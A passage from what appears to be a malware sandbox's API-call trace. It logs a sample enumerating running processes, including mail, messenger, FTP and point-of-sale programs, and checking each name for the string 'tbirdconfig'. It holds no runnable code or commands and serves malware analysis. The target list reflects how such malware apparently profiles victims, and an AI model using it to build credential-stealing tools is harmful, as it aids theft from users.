cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.310] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574608 [0095.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3574608, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0095.310] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0095.310] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="tbirdconfig") returned 0x0 [0095.310] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0095.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.311] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3574648 [0095.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3574648, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0095.311] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0095.311] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="tbirdconfig") returned 0x0 [0095.311] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0095.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.313] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3537368 [0095.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3537368, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0095.313] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0095.313] StrStrIA (lpFirst="icq.exe", lpSrch="tbirdconfig") returned 0x0 [0095.313] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0095.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.314] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572d08 [0095.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572d08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.314] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0095.314] StrStrIA (lpFirst="leechftp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.315] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0095.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.316] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572af8 [0095.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572af8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.316] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0095.316] StrStrIA (lpFirst="ncftp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.316] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0095.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.317] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572ca8 [0095.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3572ca8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0095.318] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0095.318] StrStrIA (lpFirst="notepad.exe", lpSrch="tbirdconfig") returned 0x0 [0095.318] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0095.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.319] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572cc0 [0095.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3572cc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0095.319] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0095.319] StrStrIA (lpFirst="operamail.exe", lpSrch="tbirdconfig") returned 0x0 [0095.319] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0095.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.320] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572cd8 [0095.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3572cd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0095.320] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0095.320] StrStrIA (lpFirst="outlook.exe", lpSrch="tbirdconfig") returned 0x0 [0095.320] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0095.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.322] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572cf0 [0095.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3572cf0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.322] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0095.322] StrStrIA (lpFirst="pidgin.exe", lpSrch="tbirdconfig") returned 0x0 [0095.322] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0095.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.323] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3572d68 [0095.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572d68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0095.323] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0095.323] StrStrIA (lpFirst="scriptftp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.323] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0095.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.324] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572b40 [0095.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3572b40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0095.324] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0095.325] StrStrIA (lpFirst="skype.exe", lpSrch="tbirdconfig") returned 0x0 [0095.325] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0095.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.326] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572b70 [0095.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3572b70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.326] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0095.326] StrStrIA (lpFirst="smartftp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.326] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0095.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.327] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3572a80 [0095.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3572a80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0095.327] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0095.328] StrStrIA (lpFirst="thunderbird.exe", lpSrch="tbirdconfig") returned 0x0 [0095.328] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0095.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.329] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572b88 [0095.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3572b88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0095.329] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0095.329] StrStrIA (lpFirst="totalcmd.exe", lpSrch="tbirdconfig") returned 0x0 [0095.329] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0095.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.330] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572a98 [0095.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3572a98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0095.330] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0095.330] StrStrIA (lpFirst="trillian.exe", lpSrch="tbirdconfig") returned 0x0 [0095.330] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0095.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.332] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572ba0 [0095.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3572ba0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0095.332] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0095.332] StrStrIA (lpFirst="webdrive.exe", lpSrch="tbirdconfig") returned 0x0 [0095.332] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0095.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.333] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3572bb8 [0095.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3572bb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.333] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0095.333] StrStrIA (lpFirst="whatsapp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.333] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0095.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.334] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572f78 [0095.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3572f78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0095.334] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0095.335] StrStrIA (lpFirst="winscp.exe", lpSrch="tbirdconfig") returned 0x0 [0095.335] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0095.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.336] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35746e8 [0095.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x35746e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0095.336] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0095.336] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="tbirdconfig") returned 0x0 [0095.336] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0095.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.337] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3574668 [0095.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3574668, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0095.337] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0095.337] StrStrIA (lpFirst="active-charge.exe", lpSrch="tbirdconfig") returned 0x0 [0095.337] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0095.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.339] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572ea0 [0095.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3572ea0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0095.339] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0095.339] StrStrIA (lpFirst="accupos.exe", lpSrch="tbirdconfig") returned 0x0 [0095.340] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0095.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.341] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3572f00 [0095.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3572f00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0095.341] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0095.341] StrStrIA (lpFirst="afr38.exe", lpSrch="tbirdconfig") returned 0x0 [0095.341] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0095.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.342] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573050 [0095.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3573050, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0095.342] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0095.342] StrStrIA (lpFirst="aldelo.exe", lpSrch="tbirdconfig") returned 0x0 [0095.342] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0095.344] WideCharToMultiByte (in: 